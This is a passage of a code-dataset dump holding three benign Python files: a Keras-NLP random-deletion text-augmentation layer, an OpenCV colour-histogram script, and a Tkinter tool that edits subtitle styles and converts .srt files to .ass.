inputs=tf.strings.split([\"Hey I like\", \"Keras and Tensorflow\"])\n >>> augmenter=RandomDeletion(rate=0.4,\n ... skip_py_fn=skip_py_fn, seed=42)\n >>> augmented=augmenter(inputs)\n >>> tf.strings.reduce_join(augmented, separator=\" \", axis=-1)\n \n \"\"\"\n\n def __init__(\n self,\n rate,\n max_deletions=None,\n skip_list=None,\n skip_fn=None,\n skip_py_fn=None,\n seed=None,\n name=None,\n dtype=\"int32\",\n **kwargs,\n ):\n if not is_int_dtype(dtype) and not is_string_dtype(dtype):\n raise ValueError(\n \"Output dtype must be an integer type or a string. \"\n f\"Received: dtype={dtype}\"\n )\n\n super().__init__(dtype=dtype, name=name, **kwargs)\n\n self.rate = rate\n self.max_deletions = max_deletions\n self.seed = random.randint(1, 1e9) if seed is None else seed\n self._generator = tf.random.Generator.from_seed(self.seed)\n self.skip_list = skip_list\n self.skip_fn = skip_fn\n self.skip_py_fn = skip_py_fn\n if self.max_deletions is not None and self.max_deletions < 0:\n raise ValueError(\n \"max_deletions must be non-negative.\"\n f\"Received max_deletions={max_deletions}.\"\n )\n\n if self.rate > 1 or self.rate < 0:\n raise ValueError(\n \"Rate must be between 0 and 1 (both inclusive).\"\n f\"Received: rate={rate}\"\n )\n\n if [self.skip_list, self.skip_fn, self.skip_py_fn].count(None) < 2:\n raise ValueError(\n \"Exactly one of `skip_list`, `skip_fn`, `skip_py_fn` must be \"\n \"provided.\"\n )\n\n if self.skip_list:\n self.StaticHashTable = tf.lookup.StaticHashTable(\n tf.lookup.KeyValueTensorInitializer(\n tf.convert_to_tensor(self.skip_list),\n tf.convert_to_tensor([True] * len(self.skip_list)),\n ),\n default_value=False,\n )\n\n def call(self, inputs):\n inputs, unbatched, _ = convert_to_ragged_batch(inputs)\n\n skip_masks = None\n if self.skip_list:\n skip_masks = self.StaticHashTable.lookup(inputs.flat_values)\n elif self.skip_fn:\n skip_masks = tf.map_fn(\n self.skip_fn, inputs.flat_values, fn_output_signature=\"bool\"\n )\n elif self.skip_py_fn:\n\n def string_fn(token):\n return self.skip_py_fn(token.numpy().decode(\"utf-8\"))\n\n def int_fn(token):\n return self.skip_py_fn(token.numpy())\n\n py_fn = string_fn if inputs.dtype == tf.string else int_fn\n\n skip_masks = tf.map_fn(\n lambda x: tf.py_function(py_fn, [x], \"bool\"),\n inputs.flat_values,\n fn_output_signature=\"bool\",\n )\n\n positions_flat = tf.range(tf.size(inputs.flat_values))\n positions = inputs.with_flat_values(positions_flat)\n if skip_masks is not None:\n skip_masks = tf.logical_not(skip_masks)\n skip_masks.set_shape([None])\n positions = tf.ragged.boolean_mask(\n positions, inputs.with_flat_values(skip_masks)\n )\n\n # Figure out how many we are going to select.\n token_counts = tf.cast(positions.row_lengths(), \"float32\")\n num_to_select = tf.random.stateless_binomial(\n shape=tf.shape(token_counts),\n seed=self._generator.make_seeds()[:, 0],\n counts=token_counts,\n probs=self.rate,\n )\n if self.max_deletions is not None:\n num_to_select = tf.math.minimum(num_to_select, self.max_deletions)\n num_to_select = tf.cast(num_to_select, \"int64\")\n\n # Shuffle and trim to items that are going to be selected.\n def _shuffle_and_trim(x):\n positions, top_n = x\n shuffled = tf.random.shuffle(positions, seed=self.seed)\n return shuffled[:top_n]\n\n selected_for_mask = tf.map_fn(\n _shuffle_and_trim,\n (positions, num_to_select),\n fn_output_signature=tf.RaggedTensorSpec(\n ragged_rank=positions.ragged_rank - 1, dtype=positions.dtype\n ),\n )\n selected_for_mask.flat_values.set_shape([None])\n\n # Construct the mask which is a boolean RT\n # Scatter 0's to positions that have been selector for deletion.\n update_values = tf.zeros_like(selected_for_mask.flat_values, \"int32\")\n update_indices = selected_for_mask.flat_values\n update_indices = tf.expand_dims(update_indices, -1)\n update_indices = tf.cast(update_indices, \"int32\")\n mask_flat = tf.ones_like(inputs.flat_values, dtype=\"int32\")\n mask_flat = tf.tensor_scatter_nd_update(\n mask_flat, update_indices, update_values\n )\n mask = tf.cast(inputs.with_flat_values(mask_flat), \"bool\")\n\n inputs = tf.ragged.boolean_mask(inputs, mask)\n\n if unbatched:\n inputs = tf.squeeze(inputs, axis=0)\n\n return inputs\n\n def get_config(self):\n config = super().get_config()\n config.update(\n {\n \"rate\": self.rate,\n \"max_deletions\": self.max_deletions,\n \"seed\": self.seed,\n \"skip_list\": self.skip_list,\n \"skip_fn\": self.skip_fn,\n \"skip_py_fn\": self.skip_py_fn,\n }\n )\n return config\n\n def compute_output_shape(self, inputs_shape):\n inputs_shape = list(inputs_shape)\n inputs_shape[-1] = None\n return tuple(inputs_shape)\n","repo_name":"keras-team/keras-nlp","sub_path":"keras_nlp/layers/preprocessing/random_deletion.py","file_name":"random_deletion.py","file_ext":"py","file_size_in_byte":9989,"program_lang":"python","lang":"en","doc_type":"code","stars":594,"dataset":"github-code","pt":"67"} +{"seq_id":"20946141301","text":"#compute a color histogram for a RGB image\nimport cv2 as cv\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimg = cv.imread(\"/home/nishant/Documents/opencv/Putin.jpg\")\ncv.imshow(\"Original Image\",img)\n\nblank_img = np.zeros(img.shape[:2],dtype=\"uint8\")\n\nrec = cv.rectangle(blank_img,(81,53),(591,593),255,-1)\nmasked_color_putin = cv.bitwise_and(img,img,mask=rec)\n\ncv.imshow(\"Color Putin Face\",masked_color_putin)\n\ncolors = ('b','g','r') #tuple of colors\n\nplt.figure()\nplt.title(\"Coloured Histogram\")\nplt.xlabel(\"Bins\")\nplt.ylabel(\"Number of pixels\")\n\ncol_channels = []\ncol_color = []\n\nfor i, column in enumerate(colors):\n #enumerate(colors)=0->'b',1->'g',2->'r'\n hist = cv.calcHist([img],[i],None,[256],[0,256])\n plt.plot(hist,color=column)\n plt.xlim([0,256])\n col_channels.append(i)\n col_color.append(column)\nplt.show()\n\nprint (col_channels) #col_channels = 0,1,2(values of i in the loop)\nprint (col_color)\n\ncv.waitKey(0)","repo_name":"nishantgta/Open-CV-Projects","sub_path":"OpenCV1/histogram2.py","file_name":"histogram2.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32212692439","text":"import tkinter as tk\nfrom tkinter import ttk\nimport tkinter.filedialog as fd\nfrom tkinter import messagebox\nfrom ctypes import windll\nimport os\nimport json\nimport chardet\n\nwindll.shcore.SetProcessDpiAwareness(1)\ntext_color = 'DodgerBlue4'\n\n\ndef choose_files():\n filetypes = (('.ass files', '*.ass'), ('All files', '*.*'))\n files = fd.askopenfilenames(parent=root, title='Choose files', filetypes=filetypes)\n #messagebox.askquestion(title='Selected files', message='Do you wish to continue?')\n i = 1\n for file in files:\n files_listbox.insert(i, file)\n i += 1\n\n\ndef menu_about():\n messagebox.showinfo(title='About', message='Replace .ass ver. 1.1.0\\nBy David Hay Racha')\n\n\ndef clear_fields(entry_list):\n for entry in entry_list:\n entry.delete(0, 'end')\n setdefault_checkbox.deselect()\n srt2ass_checkbox.deselect()\n name_entry.focus()\n\n\ndef clear_selected():\n files_listbox.delete(0, 'end')\n\n\ndef checkbox_check(chk_var):\n if chk_var.get() == 1:\n return True\n return False\n\ndef check_fields(var_list, default_vars):\n i = 0\n for entry in entry_list:\n if len(entry.get()) == 0:\n x = len(entry.get())\n entry.insert(0, default_vars[i])\n y = entry.get()\n i += 1\n\n'''i = 0\n for entry in entry_list:\n con = config.get(var_list[i])\n con = con.lstrip('&H')\n entry.insert(0, con)\n i += 1'''\n\n\ndef submit(chk_var, convert_box):\n check_fields(var_list, default_vars)\n chk_box_result = checkbox_check(chk_var)\n if chk_box_result:\n create_json(var_list, entry_list)\n convert_box = checkbox_check(convert_box)\n if convert_box:\n srt_list = []\n for i in range(files_listbox.size()):\n srt_list.append(files_listbox.get(i))\n new_files_name = srt_files(srt_list)\n listbox_new_files(new_files_name)\n change_files(entry_list)\n\n ## for checking ## print(chk_box_result)\n\n\ndef listbox_new_files(new_files_name):\n i = 0\n for new_file in new_files_name:\n files_listbox.insert(i, new_file)\n i += 1\n\ndef check_json():\n json_path = 'defaults.json'\n if os.path.isfile(json_path):\n return 'normal'\n return 'disabled'\n\n\ndef create_json(var_list, entry_list):\n json_exist = check_json()\n if json_exist == 'normal':\n answer = messagebox.askquestion('Defaults exists', 'The Defaults settings file already exists.'\n ' Are you sure you want to Over-Write it?\\n'\n 'Over-Writing it will ERASE all previous settings!', icon='warning')\n if answer == 'yes':\n json_dict = {}\n i = 0\n for entry in entry_list:\n if entry == primarycolor_entry or entry == secondarycolor_entry or entry == outlinecolor_entry or entry == backcolor_entry:\n con = reverse_entry(entry.get())\n else:\n con = entry.get()\n json_dict[var_list[i]] = con\n i += 1\n js_object = json.dumps(json_dict, indent=4)\n with open('defaults.json', 'w') as f:\n f.write(js_object)\n else:\n return\n\n\ndef check_encoding(file):\n with open(file, 'rb') as f:\n result = chardet.detect(f.read())\n return result['encoding']\n\n\ndef open_file(file_path, ass_string):\n file_encoding = check_encoding(file_path)\n with open(file_path, 'r', encoding=str(file_encoding)) as asf:\n content = asf.readlines()\n i = 0\n for con in content:\n if con.startswith('Style'):\n content[i] = ass_string\n with open(file_path, 'w') as cf:\n cf.writelines(content)\n i += 1\n\n\ndef change_files(entry_list):\n ass_format = ''\n for entry in entry_list:\n if entry == primarycolor_entry or entry == secondarycolor_entry or entry == outlinecolor_entry or entry == backcolor_entry:\n con = reverse_entry(entry.get())\n ass_format += con + ','\n else:\n ass_format += (entry.get() + ',')\n ass_format = 'Style: ' + ass_format\n ass_format = ass_format.rstrip(ass_format[-1])\n ass_format = ass_format + '\\n'\n file_num = files_listbox.size()\n for i in range(file_num):\n open_file(files_listbox.get(i), ass_format)\n\n clear_fields(entry_list)\n clear_selected()\n ## test ## print(files_listbox.get(i))\n\n\ndef reverse_entry(content):\n con = \"\".join(reversed([content[i:i + 2] for i in range(0, len(content), 2)]))\n return '&H' + con\n\n\ndef messages(msg):\n if msg == 1:\n messagebox.showinfo(title='Style name', message='The name of the Style. Case sensitive. Cannot include commas.')\n if msg == 2:\n messagebox.showinfo(title='Font name', message='The fontname as used by Windows. Case-sensitive.')\n if msg == 3:\n messagebox.showinfo(title='Font size', message='Literally what it says :-)')\n if msg == 4:\n messagebox.showinfo(title='Primary color', message='A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR. This is the colour that a subtitle will normally appear in')\n if msg == 5:\n messagebox.showinfo(title='Secondary color', message=' A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR. This colour may be used instead of the Primary colour when a subtitle is automatically shifted to prevent an onscreen collsion, to distinguish the different subtitles.')\n if msg == 6:\n messagebox.showinfo(title='Outline color', message='A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR. This colour may be used instead of the Primary or Secondary colour when a subtitle is automatically shifted to prevent an onscreen collsion, to distinguish the different subtitles.')\n if msg == 7:\n messagebox.showinfo(title='Back color', message='This is the colour of the subtitle outline or shadow, if these are used. A long integer BGR (blue-green-red) value. ie. the byte order in the hexadecimal equivelent of this number is BBGGRR')\n if msg == 8:\n messagebox.showinfo(title='Bold', message='This defines whether text is bold (true) or not (false). -1 is True, 0 is False. This is independant of the Italic attribute - you can have have text which is both bold and italic.')\n if msg == 9:\n messagebox.showinfo(title='Italic', message='This defines whether text is italic (true) or not (false). -1 is True, 0 is False. This is independant of the bold attribute - you can have have text which is both bold and italic.')\n if msg == 10:\n messagebox.showinfo(title='Underline', message='This defines whether text is underlined (true) or not (false). -1 is True, 0 is False. This is independant of the bold attribute - you can have have text which is both bold and italic.')\n if msg == 11:\n messagebox.showinfo(title='Strikeout', message='This defines whether text is striked-out (true) or not (false). -1 is True, 0 is False. This is independant of the bold attribute - you can have have text which is both bold and italic.')\n if msg == 12:\n messagebox.showinfo(title='ScaleX', message='Modifies the width of the font. [percent]')\n if msg == 13:\n messagebox.showinfo(title='ScaleY', message='Modifies the height of the font. [percent]')\n if msg == 14:\n messagebox.showinfo(title='Spacing', message='Extra space between characters. [pixels]')\n if msg == 15:\n messagebox.showinfo(title='Angel', message='The origin of the rotation is defined by the alignment. Can be a floating point number. [degrees]')\n if msg == 16:\n messagebox.showinfo(title='Border style', message='1=Outline + drop shadow, 3=Opaque box')\n if msg == 17:\n messagebox.showinfo(title='Outline', message='If BorderStyle is 1, then this specifies the width of the outline around the text, in pixels. Values may be 0, 1, 2, 3 or 4.')\n if msg == 18:\n messagebox.showinfo(title='Shadow', message='If BorderStyle is 1, then this specifies the depth of the drop shadow behind the text, in pixels. Values may be 0, 1, 2, 3 or 4. Drop shadow is always used in addition to an outline - SSA will force an outline of 1 pixel if no outline width is given.')\n if msg == 19:\n messagebox.showinfo(title='Alignment', message='This sets how text is \"justified\" within the Left/Right onscreen margins, and also the vertical placing. Values may be 1=Left, 2=Centered, 3=Right. Add 4 to the value for a \"Toptitle\". Add 8 to the value for a \"Midtitle\". eg. 5 = left-justified toptitle. but after the layout of the numpad (1-3 sub, 4-6 mid, 7-9 top).')\n if msg == 20:\n messagebox.showinfo(title='MarginL', message='This defines the Left Margin in pixels. It is the distance from the left-hand edge of the screen.The three onscreen margins (MarginL, MarginR, MarginV) define areas in which the subtitle text will be displayed.')\n if msg == 21:\n messagebox.showinfo(title='MarginR', message='This defines the Right Margin in pixels. It is the distance from the right-hand edge of the screen. The three onscreen margins (MarginL, MarginR, MarginV) define areas in which the subtitle text will be displayed.')\n if msg == 22:\n messagebox.showinfo(title='MarginV', message='This defines the vertical Left Margin in pixels. For a subtitle, it is the distance from the bottom of the screen. For a toptitle, it is the distance from the top of the screen. For a midtitle, the value is ignored - the text will be vertically centred')\n if msg == 23:\n messagebox.showinfo(title='Encoding', message='This specifies the font character set or encoding and on multi-lingual Windows installations it provides access to characters used in multiple than one languages. It is usually 0 (zero) for English (Western, ANSI) Windows. When the file is Unicode, this field is useful during file format conversions.')\n\n\n#def trim_left(content):\n# return content.strip('&H')\n\n\ndef load_defaults():\n with open('defaults.json', 'r') as f:\n config = json.load(f)\n i = 0\n for entry in entry_list:\n con = config.get(var_list[i])\n con = con.lstrip('&H')\n entry.insert(0, con)\n i += 1\n\n\ndef trimlinenum(line):\n line.pop(0)\n #print(line)\n return line\n\ndef timeline(line):\n start = str(line[1:11])\n start = start.replace(',', '.')\n end = str(line[18:28])\n end = end.replace(',', '.')\n #print(start, end)\n return start, end\n\ndef get_text(line):\n\n line = (''.join(line))\n line = line.rstrip()\n return line.replace('\\n', '\\\\N')\n\n\ndef check_utf():\n pass\n\n\ndef change_file_name(filename):\n return filename.replace('srt', 'ass')\n\n\ndef srt_files(files):\n hardcoded = ['[Script Info]', 'ScriptType: v4.00+', 'Collisions: Normal', 'PlayResX: 384', 'PlayResY: 288',\n 'Timer: 100.0000', '\\n\\n', '[V4+ Styles]', 'Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding',\n 'Style: Default,Tahoma,24,&H00ECEB50,&H00FFFFFF,&H00FFFFFF,&H00C0C0C0,-1,0,0,0,100,100,0,0.00,1,2,3,2,20,20,20,1',\n '\\n\\n', '[Events]', 'Format: Layer, Start, End, Style, Actor, MarginL, MarginR, MarginV, Effect, Text']\n #filetypes = ('All files', '*.*')\n #files = fd.askopenfilenames(parent=root, title='Choose files')#, filetypes=filetypes)\n #messagebox.askquestion(title='Selected files', message='Do you wish to continue?')\n file = ''\n\n sub_first = 'Dialogue: 0'\n asssublines = []\n new_file_list = []\n for file in files:\n subline = []\n sublines = []\n #file += item\n new_file = change_file_name(file)\n new_file_list.append(new_file)\n file_encoding = check_encoding(file)\n with open(file, 'r', encoding=file_encoding) as f:\n con = f.readlines()\n '''if con[len(con) - 1] == '\\n':\n con = con[:-1]'''\n while con[len(con) - 1] == '\\n':\n con = con[:-1]\n for item in con:\n if item != '\\n':\n subline.append(item)\n else:\n sublines.append(subline)\n subline = []\n sublines.append(subline)\n\n #print(sublines)\n #asssub = ''\n\n #sub_Stime = ''\n #sub_Etime = ''\n #sub_text = ''\n\n for line in sublines:\n #print(line)\n asssub = ''\n line = trimlinenum(line)\n sub_start, sub_end = timeline(line[0])\n sub_text = get_text(line[1:len(line)])\n asssub = f'{sub_first},{sub_start},{sub_end},Default,,0000,0000,0000,,{sub_text}'\n asssublines.append(asssub)\n\n #sublines = []\n #print(asssub)\n #print(asssublines)\n\n with open(new_file, 'w', encoding='utf-8') as f:\n for item in hardcoded:\n f.write('%s\\n' % item)\n\n with open(new_file, 'a', encoding='utf-8') as f:\n for assline in asssublines:\n f.write('%s\\n' % assline)\n asssublines = []\n return new_file_list\n\n\n\n\n\n# Create the main window\n\nroot = tk.Tk()\nroot.title('Subtitler')\nroot.geometry('458x600+350+150')\n#root.iconbitmap('assets/reminder.ico')\n\n\n# Create variables\n\nName = tk.StringVar()\nFontname = tk.StringVar()\nFontsize = tk.StringVar()\nPrimaryColour = tk.StringVar()\nSecondaryColour = tk.StringVar()\nOutlineColour = tk.StringVar()\nBackColour = tk.StringVar()\nBold = tk.StringVar()\nItalic = tk.StringVar()\nUnderline = tk.StringVar()\nStrikeOut = tk.StringVar()\nScaleX = tk.StringVar()\nScaleY = tk.StringVar()\nSpacing = tk.StringVar()\nAngle = tk.StringVar()\nBorderStyle = tk.StringVar()\nOutline = tk.StringVar()\nShadow = tk.StringVar()\nAlignment = tk.StringVar()\nMarginL = tk.StringVar()\nMarginR = tk.StringVar()\nMarginV = tk.StringVar()\nEncoding = tk.StringVar()\nsetasdefault = tk.IntVar()\nsrt2ass = tk.IntVar()\ndefault_vars = ['Default', 'Tahoma', '24', 'FFFFFF', 'FFFFFF', 'FFFFFF', 'C0C0C0', '-1', '0', '0', '0', '100', '100',\n '0', '0.00', '1', '2', '3', '2', '20', '20', '20', '1']\n\nvar_list = ['Name', 'Fontname', 'Fontsize', 'PrimaryColour', 'SecondaryColour', 'OutlineColour', 'BackColour', 'Bold',\n 'Italic', 'Underline', 'StrikeOut', 'ScaleX', 'ScaleY', 'Spacing', 'Angle', 'BorderStyle', 'Outline',\n 'Shadow', 'Alignment', 'MarginL', 'MarginR', 'MarginV', 'Encoding']\n\n# Create Main Menu Bar\nmenu_bar = tk.Menu(root)\nroot.config(menu=menu_bar)\n\n# Create File Menu\n\nfile_menu = tk.Menu(menu_bar, tearoff=False)\nmenu_bar.add_cascade(label='File', menu=file_menu)\nfile_menu.add_command(label='Save as Default')\nfile_menu.add_separator()\nfile_menu.add_command(label='Submit')\nfile_menu.add_separator()\nfile_menu.add_command(label='Exit', command=root.quit)\n\n\n# Create Edit Menu\n\nedit_menu = tk.Menu(menu_bar, tearoff=False)\nmenu_bar.add_cascade(label='Edit', menu=edit_menu)\nedit_menu.add_command(label='Reset to Original')\nedit_menu.add_command(label='Clear fields', command=lambda: clear_fields(entry_list))\nedit_menu.add_command(label='Clear files', command=lambda : clear_selected())\n\n# Create Help Menu\n\nhelp_menu = tk.Menu(menu_bar, tearoff=False)\nmenu_bar.add_cascade(label='Help', menu=help_menu)\nhelp_menu.add_command(label='About', command=menu_about)\n\n# main window label\n\nmain_label = ttk.Label(root, text='Change .ass subtitle style', foreground=text_color, font=('Ariel', 14, 'bold'))\nmain_label.place(x=100, y=10)\n\n\n# name label and entry\n\nname_label = ttk.Label(root, text='Name:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nname_label.place(x=20, y=50)\nname_label.bind('', lambda e: messages(1))\nname_entry = tk.Entry(root, textvariable=Name)\nname_entry.place(x=20, y=70)\nname_entry.focus()\n\n\n# font name label and entry\n\nfontname_label = ttk.Label(root, text='Font Name:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nfontname_label.place(x=166, y=50)\nfontname_label.bind('', lambda e: messages(2))\nfontname_entry = tk.Entry(root, textvariable=Fontname)\nfontname_entry.place(x=166, y=70)\n\n\n# font size label and entry\n\nfontsize_label = ttk.Label(root, text='Font Size:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nfontsize_label.place(x=312, y=50)\nfontsize_label.bind('', lambda e: messages(3))\nfontsize_entry = tk.Entry(root, textvariable=Fontsize)\nfontsize_entry.place(x=312, y=70)#, width=61)\n\n\n# primary color label and entry\n\nprimarycolor_label = ttk.Label(root, text='Primary Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nprimarycolor_label.place(x=20, y=100)\nprimarycolor_label.bind('', lambda e: messages(4))\nprimarycolor_entry = tk.Entry(root, textvariable=PrimaryColour)\nprimarycolor_entry.place(x=20, y=120, width=89.5)\n\n\n# secondary color label and entry\n\nsecondarycolor_label = ttk.Label(root, text='Secondary Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nsecondarycolor_label.place(x=129.5, y=100)\nsecondarycolor_label.bind('', lambda e:messages(5))\nsecondarycolor_entry = tk.Entry(root, textvariable=SecondaryColour)\nsecondarycolor_entry.place(x=129.5, y=120, width=89.5)\n\n\n# outline color label and entry\n\noutlinecolor_label = ttk.Label(root, text='Outline Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\noutlinecolor_label.place(x=239, y=100)\noutlinecolor_label.bind('', lambda e:messages(6))\noutlinecolor_entry = tk.Entry(root, textvariable=OutlineColour)\noutlinecolor_entry.place(x=239, y=120, width=89.5)\n\n\n# back coloe label and entry\n\nbackcolor_label = ttk.Label(root, text='Back Color:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nbackcolor_label.place(x=348.5, y=100)\nbackcolor_label.bind('', lambda e:messages(7))\nbackcolor_entry = tk.Entry(root, textvariable=BackColour)\nbackcolor_entry.place(x=348.5, y=120, width=89.5)\n\n\n# bold label and entry\n\nbold_label = ttk.Label(root, text='Bold:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nbold_label.place(x=20, y=150)\nbold_label.bind('', lambda e:messages(8))\nbold_entry = tk.Entry(root, textvariable=Bold)\nbold_entry.place(x=20, y=170, width=89.5)\n\n\n# italic label and entry\n\nitalic_label = ttk.Label(root, text='Italic:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nitalic_label.place(x=129.5, y=150)\nitalic_label.bind('', lambda e:messages(9))\nitalic_entry = tk.Entry(root, textvariable=Italic)\nitalic_entry.place(x=129.5, y=170, width=89.5)\n\n\n# under line label and entry\n\nunderline_label = ttk.Label(root, text='Underline:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nunderline_label.place(x=239, y=150)\nunderline_label.bind('', lambda e:messages(10))\nunderline_entry = tk.Entry(root, textvariable=Underline)\nunderline_entry.place(x=239, y=170, width=89.5)\n\n\n# strikeout label and entry\n\nstrikeout_label = ttk.Label(root, text='Strikeout:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nstrikeout_label.place(x=348.5, y=150)\nstrikeout_label.bind('', lambda e:messages(11))\nstrikeout_entry = tk.Entry(root, textvariable=StrikeOut)\nstrikeout_entry.place(x=348.5, y=170, width=89.5)\n\n\n# scaleX label and entry\n\nscalex_label = ttk.Label(root, text='ScaleX:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nscalex_label.place(x=20, y=200)\nscalex_label.bind('', lambda e:messages(12))\nscalex_entry = tk.Entry(root, textvariable=ScaleX)\nscalex_entry.place(x=20, y=220, width=89.5)\n\n\n# scaleY label and entry\n\nscaley_label = ttk.Label(root, text='ScaleY:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nscaley_label.place(x=129.5, y=200)\nscaley_label.bind('', lambda e:messages(13))\nscaley_entry = tk.Entry(root, textvariable=ScaleY)\nscaley_entry.place(x=129.5, y=220, width=89.5)\n\n\n# spacing label and entry\n\nspacing_label = ttk.Label(root, text='Spacing:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nspacing_label.place(x=239, y=200)\nspacing_label.bind('', lambda e:messages(14))\nspacing_entry = tk.Entry(root, textvariable=Spacing)\nspacing_entry.place(x=239, y=220, width=89.5)\n\n\n# angel label and entry\n\nangel_label = ttk.Label(root, text='Angel:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nangel_label.place(x=348.5, y=200)\nangel_label.bind('', lambda e:messages(15))\nangel_entry = tk.Entry(root, textvariable=Angle)\nangel_entry.place(x=348.5, y=220, width=89.5)\n\n\n# border style label and entry\n\nborderstyle_label = ttk.Label(root, text='Border Style:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nborderstyle_label.place(x=20, y=250)\nborderstyle_label.bind('', lambda e:messages(16))\nborderstyle_entry = tk.Entry(root, textvariable=BorderStyle)\nborderstyle_entry.place(x=20, y=270, width=89.5)\n\n\n# outline label and entry\n\noutline_label = ttk.Label(root, text='Outline:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\noutline_label.place(x=129.5, y=250)\noutline_label.bind('', lambda e:messages(17))\noutline_entry = tk.Entry(root, textvariable=Outline)\noutline_entry.place(x=129.5, y=270, width=89.5)\n\n\n# shadow label and entry\n\nshadow_label = ttk.Label(root, text='Shadow:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nshadow_label.place(x=239, y=250)\nshadow_label.bind('', lambda e:messages(18))\nshadow_entry = tk.Entry(root, textvariable=Shadow)\nshadow_entry.place(x=239, y=270, width=89.5)\n\n\n# alignment label and entry\n\nalignment_label = ttk.Label(root, text='Alignment:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nalignment_label.place(x=348.5, y=250)\nalignment_label.bind('', lambda e:messages(19))\nalignment_entry = tk.Entry(root, textvariable=Alignment)\nalignment_entry.place(x=348.5, y=270, width=89.5)\n\n\n# margin left label and entry\n\nmarginl_label = ttk.Label(root, text='MarginL:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nmarginl_label.place(x=20, y=300)\nmarginl_label.bind('', lambda e:messages(20))\nmarginl_entry = tk.Entry(root, textvariable=MarginL)\nmarginl_entry.place(x=20, y=320, width=89.5)\n\n\n# margin right label and entry\n\nmarginr_label = ttk.Label(root, text='MarginR:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nmarginr_label.place(x=129.5, y=300)\nmarginr_label.bind('', lambda e:messages(21))\nmarginr_entry = tk.Entry(root, textvariable=MarginR)\nmarginr_entry.place(x=129.5, y=320, width=89.5)\n\n\n# margin vector label and entry\n\nmarginv_label = ttk.Label(root, text='MarginV:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nmarginv_label.place(x=239, y=300)\nmarginv_label.bind('', lambda e:messages(22))\nmarginv_entry = tk.Entry(root, textvariable=MarginV)\nmarginv_entry.place(x=239, y=320, width=89.5)\n\n\n# Encoding label and entry\n\nencoding_label = ttk.Label(root, text='Encoding:', foreground=text_color, font=('Ariel', 10), cursor='hand2')\nencoding_label.place(x=348, y=300)\nencoding_label.bind('', lambda e:messages(23))\nencoding_entry = tk.Entry(root, textvariable=Encoding)\nencoding_entry.place(x=348, y=320, width=89.5)\n\nentry_list = [name_entry, fontname_entry, fontsize_entry, primarycolor_entry, secondarycolor_entry, outlinecolor_entry,\n backcolor_entry, bold_entry, italic_entry, underline_entry, strikeout_entry, scalex_entry, scaley_entry,\n spacing_entry, angel_entry, borderstyle_entry, outline_entry, shadow_entry, alignment_entry,\n marginl_entry, marginr_entry, marginv_entry, encoding_entry]\n\n\n# set as default checkbox\n\nsetdefault_checkbox = tk.Checkbutton(root, text='Set setting as Default', fg=text_color, font=('Ariel', 10),\n variable=setasdefault)\nsetdefault_checkbox.place(x=20, y=345)\n\n\n# Convert from .srt to .ass checkbox\n\nsrt2ass_checkbox = tk.Checkbutton(root, text='Convert .srt file to .ass', fg=text_color, font=('Ariel', 10), variable=srt2ass)\nsrt2ass_checkbox.place(x=20, y=370)\n\n\n# clear all fields button\n\nclearsetting_btn = tk.Button(root, text='Clear all fields', foreground='red', font=('Ariel', 11, 'bold'),\n command=lambda: clear_fields(entry_list))\nclearsetting_btn.place(x=323, y=350)\n\n\n# load defaults button\n\nbtn_state = check_json()\nloaddefaults_btn = tk.Button(root, text='Load Defaults', foreground=text_color, font=('Ariel', 11, 'bold'),\n state=btn_state, command=lambda: load_defaults())\nloaddefaults_btn.place(x=190, y=350)\n\n\n# line seperator\n\nseperator = ttk.Separator(root, orient='horizontal')\nseperator.place(x=20, y=395, width=418)\n\n\n# text area\n\nfileslist_label = ttk.Label(root, text='Selected files:', foreground=text_color, font=('Ariel', 11, 'bold'))\nfileslist_label.place(x=240, y=400)\nfiles_listbox = tk.Listbox(root)\nfiles_listbox.place(x=150, y=420, width=288, height=170)\n\n\n# choose files button\n\nchoosefiles_button = tk.Button(root, text='Choose Files', foreground=text_color, font=('Ariel', 12, 'bold'),\\\n command=lambda: choose_files())\nchoosefiles_button.place(x=20, y=400, width=120)\n\n\n# clear files button\n\nclearfiles_btn = tk.Button(root, text='Clear Selected', foreground=text_color, font=('Ariel', 12, 'bold'),\\\n command=lambda: clear_selected())\nclearfiles_btn.place(x=20, y=450, width=120)\n\n\n# submit changes to files button\n\nsubmit_btn = tk.Button(root, text='Submit', foreground=text_color, font=('Ariel', 12, 'bold'),\n command=lambda: submit(setasdefault, srt2ass))\nsubmit_btn.place(x=20, y=500, width=120)\n\n# line seperator\n\nseperator = ttk.Separator(root, orient='horizontal')\nseperator.place(x=20, y=540, width=120)\n\n\n\n# exit button\n\nexit_btn = tk.Button(root, text='Exit', foreground=text_color, font=('Ariel', 12, 'bold'), command=root.quit)\nexit_btn.place(x=20, y=550, 